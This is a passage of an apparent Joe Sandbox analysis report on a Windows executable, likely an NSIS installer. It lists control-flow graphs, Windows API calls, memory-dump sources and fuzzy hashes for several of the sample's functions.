                                                                                                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                  • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                  • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                  • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                  • API String ID: 651206458-1535804072
                                                                                                                                                  • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                  • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                  • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                  • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                                                                  Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                  • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                  • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                  • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2740478559-0
                                                                                                                                                  • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                                                                  • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                  • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                                                                  • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                                                                  Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                  • GlobalFree.KERNELBASE(00779440), ref: 00402387
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeGloballstrcpyn
                                                                                                                                                  • String ID: 142$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                  • API String ID: 1459762280-2464112085
                                                                                                                                                  • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                                                                  • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                  • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                                                                  • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                                                                  Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                  • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                  • GlobalFree.KERNELBASE(00779440), ref: 00402387
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3376005127-0
                                                                                                                                                  • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                  • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                  • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                  • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                                                                  Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2568930968-0
                                                                                                                                                  • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                  • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                  • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                  • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                                                                  Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                  • String ID: 142$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                  • API String ID: 247603264-2763251220
                                                                                                                                                  • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                  • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                  • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                  • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                                                                  Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  Strings
                                                                                                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                  • API String ID: 3156913733-2180253247
                                                                                                                                                  • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                  • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                  • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                  • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                  Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                  • String ID: nsa
                                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                                  • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                  • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                  • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                  • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                  Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                  • String ID: HideWindow
                                                                                                                                                  • API String ID: 1249568736-780306582
                                                                                                                                                  • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                  • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
